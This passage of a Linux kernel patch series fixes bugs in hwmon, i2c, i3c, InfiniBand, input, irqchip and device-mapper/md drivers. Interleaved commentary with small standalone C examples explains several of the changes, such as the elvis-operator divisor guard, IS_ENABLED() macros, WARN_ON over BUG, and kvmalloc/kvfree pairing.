++			if (!val) {
++				fwnode_handle_put(child);
++				return dev_err_probe(&st->client->dev, -EINVAL,
++						     "shunt resistor value cannot be zero\n");
++			}
+ 			st->r_sense_uohm[addr] = val;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/hwmon/pc87360.c b/drivers/hwmon/pc87360.c
+index a4adc8bd531ff..534a6072036c9 100644
+--- a/drivers/hwmon/pc87360.c
++++ b/drivers/hwmon/pc87360.c
+@@ -323,7 +323,11 @@ static struct pc87360_data *pc87360_update_device(struct device *dev)
+ 		}
+ 
+ 		/* Voltages */
+-		for (i = 0; i < data->innr; i++) {
++		/*
++		 * The min() below does not have any practical meaning and is
++		 * only needed to silence a warning observed with gcc 12+.
++		 */
++		for (i = 0; i < min(data->innr, ARRAY_SIZE(data->in)); i++) {
+ 			data->in_status[i] = pc87360_read_value(data, LD_IN, i,
+ 					     PC87365_REG_IN_STATUS);
+ 			/* Clear bits */
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index cc957655cec24..471279bd70061 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -990,8 +990,10 @@ static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
+ 		return ret;
+ 
+ 	ret = clk_prepare_enable(gi2c->core_clk);
+-	if (ret)
++	if (ret) {
++		geni_icc_disable(&gi2c->se);
+ 		return ret;
++	}
+ 
+ 	ret = geni_se_resources_on(&gi2c->se);
+ 	if (ret) {
+diff --git a/drivers/i2c/busses/i2c-riic.c b/drivers/i2c/busses/i2c-riic.c
+index 849848ccb0802..b9959621cc5d7 100644
+--- a/drivers/i2c/busses/i2c-riic.c
++++ b/drivers/i2c/busses/i2c-riic.c
+@@ -314,7 +314,7 @@ static int riic_init_hw(struct riic_dev *riic, struct i2c_timings *t)
+ 	 * frequency with only 62 clock ticks max (31 high, 31 low).
+ 	 * Aim for a duty of 60% LOW, 40% HIGH.
+ 	 */
+-	total_ticks = DIV_ROUND_UP(rate, t->bus_freq_hz);
++	total_ticks = DIV_ROUND_UP(rate, t->bus_freq_hz ?: 1);
+ 
+ 	for (cks = 0; cks < 7; cks++) {
+ 		/*
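
The "t->bus_freq_hz ?: 1" change above uses the GNU C elvis operator to substitute 1 for a zero divisor, so a bogus (zero) bus frequency from firmware degrades into an out-of-range tick count that later validation can reject, instead of a divide-by-zero. A standalone sketch (gcc and clang both support ?:):

#include <stdio.h>

#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

int main(void)
{
	unsigned long rate = 33325000;  /* example parent clock, Hz */
	unsigned long bus_freq_hz = 0;  /* bogus value from firmware */

	/* "x ?: y" yields x if x is nonzero, else y; the zero divisor
	 * becomes a harmless 1 rather than a crash. */
	unsigned long total_ticks = DIV_ROUND_UP(rate, bus_freq_hz ?: 1);

	printf("total_ticks = %lu\n", total_ticks);
	return 0;
}
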
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index aa469b33ee2ee..f7b4977d66496 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -298,6 +298,9 @@ struct tegra_i2c_dev {
+ 	bool is_vi;
+ };
+ 
++#define IS_DVC(dev) (IS_ENABLED(CONFIG_ARCH_TEGRA_2x_SOC) && (dev)->is_dvc)
++#define IS_VI(dev)  (IS_ENABLED(CONFIG_ARCH_TEGRA_210_SOC) && (dev)->is_vi)
++
+ static void dvc_writel(struct tegra_i2c_dev *i2c_dev, u32 val,
+ 		       unsigned int reg)
+ {
+@@ -315,9 +318,9 @@ static u32 dvc_readl(struct tegra_i2c_dev *i2c_dev, unsigned int reg)
+  */
+ static u32 tegra_i2c_reg_addr(struct tegra_i2c_dev *i2c_dev, unsigned int reg)
+ {
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		reg += (reg >= I2C_TX_FIFO) ? 0x10 : 0x40;
+-	else if (i2c_dev->is_vi)
++	else if (IS_VI(i2c_dev))
+ 		reg = 0xc00 + (reg << 2);
+ 
+ 	return reg;
+@@ -330,7 +333,7 @@ static void i2c_writel(struct tegra_i2c_dev *i2c_dev, u32 val, unsigned int reg)
+ 	/* read back register to make sure that register writes completed */
+ 	if (reg != I2C_TX_FIFO)
+ 		readl_relaxed(i2c_dev->base + tegra_i2c_reg_addr(i2c_dev, reg));
+-	else if (i2c_dev->is_vi)
++	else if (IS_VI(i2c_dev))
+ 		readl_relaxed(i2c_dev->base + tegra_i2c_reg_addr(i2c_dev, I2C_INT_STATUS));
+ }
+ 
+@@ -446,7 +449,7 @@ static int tegra_i2c_init_dma(struct tegra_i2c_dev *i2c_dev)
+ 	u32 *dma_buf;
+ 	int err;
+ 
+-	if (i2c_dev->is_vi)
++	if (IS_VI(i2c_dev))
+ 		return 0;
+ 
+ 	if (i2c_dev->hw->has_apb_dma) {
+@@ -639,7 +642,7 @@ static int tegra_i2c_init(struct tegra_i2c_dev *i2c_dev)
+ 
+ 	WARN_ON_ONCE(err);
+ 
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		tegra_dvc_init(i2c_dev);
+ 
+ 	val = I2C_CNFG_NEW_MASTER_FSM | I2C_CNFG_PACKET_MODE_EN |
+@@ -651,7 +654,7 @@ static int tegra_i2c_init(struct tegra_i2c_dev *i2c_dev)
+ 	i2c_writel(i2c_dev, val, I2C_CNFG);
+ 	i2c_writel(i2c_dev, 0, I2C_INT_MASK);
+ 
+-	if (i2c_dev->is_vi)
++	if (IS_VI(i2c_dev))
+ 		tegra_i2c_vi_init(i2c_dev);
+ 
+ 	switch (t->bus_freq_hz) {
+@@ -703,7 +706,7 @@ static int tegra_i2c_init(struct tegra_i2c_dev *i2c_dev)
+ 		return err;
+ 	}
+ 
+-	if (!i2c_dev->is_dvc && !i2c_dev->is_vi) {
++	if (!IS_DVC(i2c_dev) && !IS_VI(i2c_dev)) {
+ 		u32 sl_cfg = i2c_readl(i2c_dev, I2C_SL_CNFG);
+ 
+ 		sl_cfg |= I2C_SL_CNFG_NACK | I2C_SL_CNFG_NEWSL;
+@@ -846,7 +849,7 @@ static int tegra_i2c_fill_tx_fifo(struct tegra_i2c_dev *i2c_dev)
+ 		i2c_dev->msg_buf_remaining = buf_remaining;
+ 		i2c_dev->msg_buf = buf + words_to_transfer * BYTES_PER_FIFO_WORD;
+ 
+-		if (i2c_dev->is_vi)
++		if (IS_VI(i2c_dev))
+ 			i2c_writesl_vi(i2c_dev, buf, I2C_TX_FIFO, words_to_transfer);
+ 		else
+ 			i2c_writesl(i2c_dev, buf, I2C_TX_FIFO, words_to_transfer);
+@@ -933,7 +936,7 @@ static irqreturn_t tegra_i2c_isr(int irq, void *dev_id)
+ 	}
+ 
+ 	i2c_writel(i2c_dev, status, I2C_INT_STATUS);
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		dvc_writel(i2c_dev, DVC_STATUS_I2C_DONE_INTR, DVC_STATUS);
+ 
+ 	/*
+@@ -972,7 +975,7 @@ static irqreturn_t tegra_i2c_isr(int irq, void *dev_id)
+ 
+ 	i2c_writel(i2c_dev, status, I2C_INT_STATUS);
+ 
+-	if (i2c_dev->is_dvc)
++	if (IS_DVC(i2c_dev))
+ 		dvc_writel(i2c_dev, DVC_STATUS_I2C_DONE_INTR, DVC_STATUS);
+ 
+ 	if (i2c_dev->dma_mode) {
+@@ -1654,13 +1657,17 @@ static const struct tegra_i2c_hw_feature tegra194_i2c_hw = {
+ static const struct of_device_id tegra_i2c_of_match[] = {
+ 	{ .compatible = "nvidia,tegra194-i2c", .data = &tegra194_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra186-i2c", .data = &tegra186_i2c_hw, },
++#if IS_ENABLED(CONFIG_ARCH_TEGRA_210_SOC)
+ 	{ .compatible = "nvidia,tegra210-i2c-vi", .data = &tegra210_i2c_hw, },
++#endif
+ 	{ .compatible = "nvidia,tegra210-i2c", .data = &tegra210_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra124-i2c", .data = &tegra124_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra114-i2c", .data = &tegra114_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra30-i2c", .data = &tegra30_i2c_hw, },
+ 	{ .compatible = "nvidia,tegra20-i2c", .data = &tegra20_i2c_hw, },
++#if IS_ENABLED(CONFIG_ARCH_TEGRA_2x_SOC)
+ 	{ .compatible = "nvidia,tegra20-i2c-dvc", .data = &tegra20_i2c_hw, },
++#endif
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, tegra_i2c_of_match);
+@@ -1675,10 +1682,12 @@ static void tegra_i2c_parse_dt(struct tegra_i2c_dev *i2c_dev)
+ 	multi_mode = device_property_read_bool(i2c_dev->dev, "multi-master");
+ 	i2c_dev->multimaster_mode = multi_mode;
+ 
+-	if (of_device_is_compatible(np, "nvidia,tegra20-i2c-dvc"))
++	if (IS_ENABLED(CONFIG_ARCH_TEGRA_2x_SOC) &&
++	    of_device_is_compatible(np, "nvidia,tegra20-i2c-dvc"))
+ 		i2c_dev->is_dvc = true;
+ 
+-	if (of_device_is_compatible(np, "nvidia,tegra210-i2c-vi"))
++	if (IS_ENABLED(CONFIG_ARCH_TEGRA_210_SOC) &&
++	    of_device_is_compatible(np, "nvidia,tegra210-i2c-vi"))
+ 		i2c_dev->is_vi = true;
+ }
+ 
+@@ -1707,7 +1716,7 @@ static int tegra_i2c_init_clocks(struct tegra_i2c_dev *i2c_dev)
+ 	if (i2c_dev->hw == &tegra20_i2c_hw || i2c_dev->hw == &tegra30_i2c_hw)
+ 		i2c_dev->clocks[i2c_dev->nclocks++].id = "fast-clk";
+ 
+-	if (i2c_dev->is_vi)
++	if (IS_VI(i2c_dev))
+ 		i2c_dev->clocks[i2c_dev->nclocks++].id = "slow";
+ 
+ 	err = devm_clk_bulk_get(i2c_dev->dev, i2c_dev->nclocks,
+@@ -1823,9 +1832,9 @@ static int tegra_i2c_probe(struct platform_device *pdev)
+ 	 * domain.
+ 	 *
+ 	 * VI I2C device shouldn't be marked as IRQ-safe because VI I2C won't
+-	 * be used for atomic transfers.
++	 * be used for atomic transfers. An ACPI device is not IRQ-safe either.
+ 	 */
+-	if (!i2c_dev->is_vi)
++	if (!IS_VI(i2c_dev) && !has_acpi_companion(i2c_dev->dev))
+ 		pm_runtime_irq_safe(i2c_dev->dev);
+ 
+ 	pm_runtime_enable(i2c_dev->dev);
+@@ -1898,7 +1907,7 @@ static int __maybe_unused tegra_i2c_runtime_resume(struct device *dev)
+ 	 * power ON/OFF during runtime PM resume/suspend, meaning that
+ 	 * controller needs to be re-initialized after power ON.
+ 	 */
+-	if (i2c_dev->is_vi) {
++	if (IS_VI(i2c_dev)) {
+ 		err = tegra_i2c_init(i2c_dev);
+ 		if (err)
+ 			goto disable_clocks;
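
Wrapping is_dvc/is_vi behind IS_DVC()/IS_VI() macros that AND in IS_ENABLED(CONFIG_...) turns each flag into a compile-time constant 0 when the SoC support is configured out, letting the compiler drop the dead branches entirely. A simplified standalone sketch; the real IS_ENABLED() in <linux/kconfig.h> also copes with undefined config symbols:

#include <stdio.h>
#include <stdbool.h>

#define CONFIG_ARCH_DEMO_SOC 0      /* the symbol must be 0 or 1 here */
#define IS_ENABLED(cfg) (cfg)

struct i2c_dev { bool is_dvc; };

#define IS_DVC(d) (IS_ENABLED(CONFIG_ARCH_DEMO_SOC) && (d)->is_dvc)

int main(void)
{
	struct i2c_dev dev = { .is_dvc = true };

	/* With the config off, IS_DVC() is a constant-false expression, so
	 * the compiler eliminates the branch and anything only it uses. */
	if (IS_DVC(&dev))
		puts("DVC register layout selected");
	else
		puts("DVC support compiled out");
	return 0;
}
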
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dma.c b/drivers/i3c/master/mipi-i3c-hci/dma.c
+index 71b5dbe45c45c..337c95d43f3f6 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dma.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dma.c
+@@ -345,6 +345,8 @@ static void hci_dma_unmap_xfer(struct i3c_hci *hci,
+ 
+ 	for (i = 0; i < n; i++) {
+ 		xfer = xfer_list + i;
++		if (!xfer->data)
++			continue;
+ 		dma_unmap_single(&hci->master.dev,
+ 				 xfer->data_dma, xfer->data_len,
+ 				 xfer->rnw ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
+@@ -450,10 +452,9 @@ static bool hci_dma_dequeue_xfer(struct i3c_hci *hci,
+ 		/*
+ 		 * We're deep in it if this condition is ever met.
+ 		 * Hardware might still be writing to memory, etc.
+-		 * Better suspend the world than risking silent corruption.
+ 		 */
+ 		dev_crit(&hci->master.dev, "unable to abort the ring\n");
+-		BUG();
++		WARN_ON(1);
+ 	}
+ 
+ 	for (i = 0; i < n; i++) {
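
Downgrading BUG() to WARN_ON(1) in the ring-abort failure path follows the kernel's general guidance: warn loudly and limp on rather than halt the whole machine for a condition the driver may survive. A standalone sketch of a WARN_ON-style macro; the kernel's real one also taints the kernel and can panic under panic_on_warn:

#include <stdio.h>

/* Simplified WARN_ON(): report and keep going, unlike BUG(). Uses a
 * GNU C statement expression, as the kernel's version does. */
#define WARN_ON(cond) ({						\
	int __ret_warn_on = !!(cond);					\
	if (__ret_warn_on)						\
		fprintf(stderr, "WARNING at %s:%d\n",			\
			__FILE__, __LINE__);				\
	__ret_warn_on;							\
})

int main(void)
{
	int abort_timed_out = 1;

	if (WARN_ON(abort_timed_out))
		puts("ring abort failed; continuing degraded, not halting");
	return 0;
}
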
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index 194cac40da653..c560552244ae8 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -13183,15 +13183,16 @@ static void read_mod_write(struct hfi1_devdata *dd, u16 src, u64 bits,
+ {
+ 	u64 reg;
+ 	u16 idx = src / BITS_PER_REGISTER;
++	unsigned long flags;
+ 
+-	spin_lock(&dd->irq_src_lock);
++	spin_lock_irqsave(&dd->irq_src_lock, flags);
+ 	reg = read_csr(dd, CCE_INT_MASK + (8 * idx));
+ 	if (set)
+ 		reg |= bits;
+ 	else
+ 		reg &= ~bits;
+ 	write_csr(dd, CCE_INT_MASK + (8 * idx), reg);
+-	spin_unlock(&dd->irq_src_lock);
++	spin_unlock_irqrestore(&dd->irq_src_lock, flags);
+ }
+ 
+ /**
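
read_mod_write() switches to spin_lock_irqsave() because the read-modify-write of the interrupt mask can be reached from contexts with interrupts disabled as well as enabled; saving and restoring the IRQ state keeps the lock correct in both. A toy standalone model of just the save/restore semantics (a real spinlock also provides mutual exclusion across CPUs):

#include <stdio.h>

static int irqs_enabled = 1;

static void lock_irqsave(unsigned long *flags)
{
	*flags = irqs_enabled;
	irqs_enabled = 0; /* an IRQ arriving now cannot re-enter us */
}

static void unlock_irqrestore(unsigned long flags)
{
	irqs_enabled = (int)flags; /* restore whatever the caller had */
}

int main(void)
{
	unsigned long flags;

	lock_irqsave(&flags);
	printf("critical section: irqs_enabled=%d\n", irqs_enabled);
	unlock_irqrestore(flags);
	printf("restored: irqs_enabled=%d\n", irqs_enabled);
	return 0;
}
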
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs.c b/drivers/infiniband/ulp/rtrs/rtrs.c
+index 716ec7baddefd..d71b1d83e9ffb 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs.c
+@@ -255,7 +255,7 @@ static int create_cq(struct rtrs_con *con, int cq_vector, int nr_cqe,
+ static int create_qp(struct rtrs_con *con, struct ib_pd *pd,
+ 		     u32 max_send_wr, u32 max_recv_wr, u32 max_sge)
+ {
+-	struct ib_qp_init_attr init_attr = {NULL};
++	struct ib_qp_init_attr init_attr = {};
+ 	struct rdma_cm_id *cm_id = con->cm_id;
+ 	int ret;
+ 
+diff --git a/drivers/input/input-mt.c b/drivers/input/input-mt.c
+index 14b53dac1253b..6b04a674f832a 100644
+--- a/drivers/input/input-mt.c
++++ b/drivers/input/input-mt.c
+@@ -46,6 +46,9 @@ int input_mt_init_slots(struct input_dev *dev, unsigned int num_slots,
+ 		return 0;
+ 	if (mt)
+ 		return mt->num_slots != num_slots ? -EINVAL : 0;
++	/* Arbitrary limit to avoid an excessively large memory allocation. */
++	if (num_slots > 1024)
++		return -EINVAL;
+ 
+ 	mt = kzalloc(struct_size(mt, slots, num_slots), GFP_KERNEL);
+ 	if (!mt)
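
Capping num_slots bounds an allocation whose size is effectively device-controlled: a malicious or broken device could otherwise request an enormous slot count. A standalone sketch of the check; the 1024 ceiling matches the patch, but the struct layout here is simplified:

#include <stdio.h>
#include <stdlib.h>

struct slot { int x, y; };
struct mt { unsigned int num_slots; struct slot slots[]; };

static struct mt *mt_alloc(unsigned int num_slots)
{
	/* Reject the count before it can size the allocation. */
	if (num_slots > 1024)
		return NULL; /* -EINVAL in the kernel */
	return calloc(1, sizeof(struct mt) +
			 (size_t)num_slots * sizeof(struct slot));
}

int main(void)
{
	printf("sane count:  %s\n", mt_alloc(10) ? "allocated" : "rejected");
	printf("huge count:  %s\n", mt_alloc(1u << 30) ? "allocated" : "rejected");
	return 0;
}
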
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 5b50475ec4140..e9eb9554dd7bd 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -83,6 +83,7 @@ static inline void i8042_write_command(int val)
+ #define SERIO_QUIRK_KBDRESET		BIT(12)
+ #define SERIO_QUIRK_DRITEK		BIT(13)
+ #define SERIO_QUIRK_NOPNP		BIT(14)
++#define SERIO_QUIRK_FORCENORESTORE	BIT(15)
+ 
+ /* Quirk table for different mainboards. Options similar or identical to i8042
+  * module parameters.
+@@ -1149,18 +1150,10 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
+ 	{
+-		/*
+-		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
+-		 * the keyboard very laggy for ~5 seconds after boot and
+-		 * sometimes also after resume.
+-		 * However both are required for the keyboard to not fail
+-		 * completely sometimes after boot or resume.
+-		 */
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "N150CU"),
+ 		},
+-		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+-					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++		.driver_data = (void *)(SERIO_QUIRK_FORCENORESTORE)
+ 	},
+ 	{
+ 		.matches = {
+@@ -1685,6 +1678,8 @@ static void __init i8042_check_quirks(void)
+ 	if (quirks & SERIO_QUIRK_NOPNP)
+ 		i8042_nopnp = true;
+ #endif
++	if (quirks & SERIO_QUIRK_FORCENORESTORE)
++		i8042_forcenorestore = true;
+ }
+ #else
+ static inline void i8042_check_quirks(void) {}
+@@ -1718,7 +1713,7 @@ static int __init i8042_platform_init(void)
+ 
+ 	i8042_check_quirks();
+ 
+-	pr_debug("Active quirks (empty means none):%s%s%s%s%s%s%s%s%s%s%s%s%s\n",
++	pr_debug("Active quirks (empty means none):%s%s%s%s%s%s%s%s%s%s%s%s%s%s\n",
+ 		i8042_nokbd ? " nokbd" : "",
+ 		i8042_noaux ? " noaux" : "",
+ 		i8042_nomux ? " nomux" : "",
+@@ -1738,10 +1733,11 @@ static int __init i8042_platform_init(void)
+ 		"",
+ #endif
+ #ifdef CONFIG_PNP
+-		i8042_nopnp ? " nopnp" : "");
++		i8042_nopnp ? " nopnp" : "",
+ #else
+-		"");
++		"",
+ #endif
++		i8042_forcenorestore ? " forcenorestore" : "");
+ 
+ 	retval = i8042_pnp_init();
+ 	if (retval)
+diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
+index 6dac7c1853a54..29340f8095bb2 100644
+--- a/drivers/input/serio/i8042.c
++++ b/drivers/input/serio/i8042.c
+@@ -115,6 +115,10 @@ module_param_named(nopnp, i8042_nopnp, bool, 0);
+ MODULE_PARM_DESC(nopnp, "Do not use PNP to detect controller settings");
+ #endif
+ 
++static bool i8042_forcenorestore;
++module_param_named(forcenorestore, i8042_forcenorestore, bool, 0);
++MODULE_PARM_DESC(forcenorestore, "Force no restore on s3 resume, copying s2idle behaviour");
++
+ #define DEBUG
+ #ifdef DEBUG
+ static bool i8042_debug;
+@@ -1232,7 +1236,7 @@ static int i8042_pm_suspend(struct device *dev)
+ {
+ 	int i;
+ 
+-	if (pm_suspend_via_firmware())
++	if (!i8042_forcenorestore && pm_suspend_via_firmware())
+ 		i8042_controller_reset(true);
+ 
+ 	/* Set up serio interrupts for system wakeup. */
+@@ -1248,7 +1252,7 @@ static int i8042_pm_suspend(struct device *dev)
+ 
+ static int i8042_pm_resume_noirq(struct device *dev)
+ {
+-	if (!pm_resume_via_firmware())
++	if (i8042_forcenorestore || !pm_resume_via_firmware())
+ 		i8042_interrupt(0, NULL);
+ 
+ 	return 0;
+@@ -1271,7 +1275,7 @@ static int i8042_pm_resume(struct device *dev)
+ 	 * not restore the controller state to whatever it had been at boot
+ 	 * time, so we do not need to do anything.
+ 	 */
+-	if (!pm_suspend_via_firmware())
++	if (i8042_forcenorestore || !pm_suspend_via_firmware())
+ 		return 0;
+ 
+ 	/*
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 3620bdb5200f2..a7a952bbfdc28 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -4476,8 +4476,6 @@ static int its_vpe_irq_domain_alloc(struct irq_domain *domain, unsigned int virq
+ 	struct page *vprop_page;
+ 	int base, nr_ids, i, err = 0;
+ 
+-	BUG_ON(!vm);
+-
+ 	bitmap = its_lpi_alloc(roundup_pow_of_two(nr_irqs), &base, &nr_ids);
+ 	if (!bitmap)
+ 		return -ENOMEM;
+diff --git a/drivers/irqchip/irq-renesas-rzg2l.c b/drivers/irqchip/irq-renesas-rzg2l.c
+index be71459c7465a..70279ca7e6278 100644
+--- a/drivers/irqchip/irq-renesas-rzg2l.c
++++ b/drivers/irqchip/irq-renesas-rzg2l.c
+@@ -132,7 +132,7 @@ static void rzg2l_irqc_irq_disable(struct irq_data *d)
+ 
+ 		raw_spin_lock(&priv->lock);
+ 		reg = readl_relaxed(priv->base + TSSR(tssr_index));
+-		reg &= ~(TSSEL_MASK << TSSEL_SHIFT(tssr_offset));
++		reg &= ~(TIEN << TSSEL_SHIFT(tssr_offset));
+ 		writel_relaxed(reg, priv->base + TSSR(tssr_index));
+ 		raw_spin_unlock(&priv->lock);
+ 	}
+@@ -145,7 +145,6 @@ static void rzg2l_irqc_irq_enable(struct irq_data *d)
+ 
+ 	if (hw_irq >= IRQC_TINT_START && hw_irq < IRQC_NUM_IRQ) {
+ 		struct rzg2l_irqc_priv *priv = irq_data_to_priv(d);
+-		unsigned long tint = (uintptr_t)d->chip_data;
+ 		u32 offset = hw_irq - IRQC_TINT_START;
+ 		u32 tssr_offset = TSSR_OFFSET(offset);
+ 		u8 tssr_index = TSSR_INDEX(offset);
+@@ -153,7 +152,7 @@ static void rzg2l_irqc_irq_enable(struct irq_data *d)
+ 
+ 		raw_spin_lock(&priv->lock);
+ 		reg = readl_relaxed(priv->base + TSSR(tssr_index));
+-		reg |= (TIEN | tint) << TSSEL_SHIFT(tssr_offset);
++		reg |= TIEN << TSSEL_SHIFT(tssr_offset);
+ 		writel_relaxed(reg, priv->base + TSSR(tssr_index));
+ 		raw_spin_unlock(&priv->lock);
+ 	}
+diff --git a/drivers/md/dm-clone-metadata.c b/drivers/md/dm-clone-metadata.c
+index c43d55672bce0..47c1fa7aad8b5 100644
+--- a/drivers/md/dm-clone-metadata.c
++++ b/drivers/md/dm-clone-metadata.c
+@@ -465,11 +465,6 @@ static void __destroy_persistent_data_structures(struct dm_clone_metadata *cmd)
+ 
+ /*---------------------------------------------------------------------------*/
+ 
+-static size_t bitmap_size(unsigned long nr_bits)
+-{
+-	return BITS_TO_LONGS(nr_bits) * sizeof(long);
+-}
+-
+ static int __dirty_map_init(struct dirty_map *dmap, unsigned long nr_words,
+ 			    unsigned long nr_regions)
+ {
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 4376754816abe..f9df723866da9 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1156,8 +1156,26 @@ static int do_resume(struct dm_ioctl *param)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+-		if (!dm_suspended_md(md))
+-			dm_suspend(md, suspend_flags);
++		if (!dm_suspended_md(md)) {
++			r = dm_suspend(md, suspend_flags);
++			if (r) {
++				down_write(&_hash_lock);
++				hc = dm_get_mdptr(md);
++				if (hc && !hc->new_map) {
++					hc->new_map = new_map;
++					new_map = NULL;
++				} else {
++					r = -ENXIO;
++				}
++				up_write(&_hash_lock);
++				if (new_map) {
++					dm_sync_table(md);
++					dm_table_destroy(new_map);
++				}
++				dm_put(md);
++				return r;
++			}
++		}
+ 
+ 		old_size = dm_get_size(md);
+ 		old_map = dm_swap_table(md, new_map);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 29270f6f272f6..ddd44a7f79dbf 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2511,7 +2511,7 @@ static int dm_wait_for_bios_completion(struct mapped_device *md, unsigned int ta
+ 			break;
+ 
+ 		if (signal_pending_state(task_state, current)) {
+-			r = -EINTR;
++			r = -ERESTARTSYS;
+ 			break;
+ 		}
+ 
+@@ -2536,7 +2536,7 @@ static int dm_wait_for_completion(struct mapped_device *md, unsigned int task_st
+ 			break;
+ 
+ 		if (signal_pending_state(task_state, current)) {
+-			r = -EINTR;
++			r = -ERESTARTSYS;
+ 			break;
+ 		}
+ 
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index b87c6ef0da8ab..297c86f5c70b5 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -7614,11 +7614,6 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 
+ 	mddev = bdev->bd_disk->private_data;
+ 
+-	if (!mddev) {
+-		BUG();
+-		goto out;
+-	}
+-
+ 	/* Some actions do not requires the mutex */
+ 	switch (cmd) {
+ 	case GET_ARRAY_INFO:
+diff --git a/drivers/md/persistent-data/dm-space-map-metadata.c b/drivers/md/persistent-data/dm-space-map-metadata.c
+index 0d1fcdf29c835..769bb70d37d59 100644
+--- a/drivers/md/persistent-data/dm-space-map-metadata.c
++++ b/drivers/md/persistent-data/dm-space-map-metadata.c
+@@ -274,7 +274,7 @@ static void sm_metadata_destroy(struct dm_space_map *sm)
+ {
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+ 
+-	kfree(smm);
++	kvfree(smm);
+ }
+ 
+ static int sm_metadata_get_nr_blocks(struct dm_space_map *sm, dm_block_t *count)
+@@ -768,7 +768,7 @@ struct dm_space_map *dm_sm_metadata_init(void)
+ {
+ 	struct sm_metadata *smm;
+ 
+-	smm = kmalloc(sizeof(*smm), GFP_KERNEL);
++	smm = kvmalloc(sizeof(*smm), GFP_KERNEL);
+ 	if (!smm)
+ 		return ERR_PTR(-ENOMEM);
+ 
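
kmalloc() needs physically contiguous pages and can fail for larger structures under memory fragmentation; kvmalloc() tries kmalloc() first and falls back to vmalloc(). The one rule is that such allocations must be released with kvfree(), which is exactly the pairing the two hunks above establish. A minimal sketch:

#include <linux/slab.h>	/* kvmalloc()/kvfree(); via mm headers on older trees */

struct big_state { char payload[64 * 1024]; };	/* illustrative size */

static struct big_state *big_state_create(void)
{
	/* may be kmalloc- or vmalloc-backed; the caller cannot tell */
	return kvmalloc(sizeof(struct big_state), GFP_KERNEL);
}

static void big_state_destroy(struct big_state *s)
{
	kvfree(s);	/* picks the matching free path */
}
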
+diff --git a/drivers/md/raid5-cache.c b/drivers/md/raid5-cache.c
+index eb66d0bfe39d2..4b9585875a669 100644
+--- a/drivers/md/raid5-cache.c
++++ b/drivers/md/raid5-cache.c
+@@ -327,8 +327,9 @@ void r5l_wake_reclaim(struct r5l_log *log, sector_t space);
+ void r5c_check_stripe_cache_usage(struct r5conf *conf)
+ {
+ 	int total_cached;
++	struct r5l_log *log = READ_ONCE(conf->log);
+ 
+-	if (!r5c_is_writeback(conf->log))
++	if (!r5c_is_writeback(log))
+ 		return;
+ 
+ 	total_cached = atomic_read(&conf->r5c_cached_partial_stripes) +
+@@ -344,7 +345,7 @@ void r5c_check_stripe_cache_usage(struct r5conf *conf)
+ 	 */
+ 	if (total_cached > conf->min_nr_stripes * 1 / 2 ||
+ 	    atomic_read(&conf->empty_inactive_list_nr) > 0)
+-		r5l_wake_reclaim(conf->log, 0);
++		r5l_wake_reclaim(log, 0);
+ }
+ 
+ /*
+@@ -353,7 +354,9 @@ void r5c_check_stripe_cache_usage(struct r5conf *conf)
+  */
+ void r5c_check_cached_full_stripe(struct r5conf *conf)
+ {
+-	if (!r5c_is_writeback(conf->log))
++	struct r5l_log *log = READ_ONCE(conf->log);
++
++	if (!r5c_is_writeback(log))
+ 		return;
+ 
+ 	/*
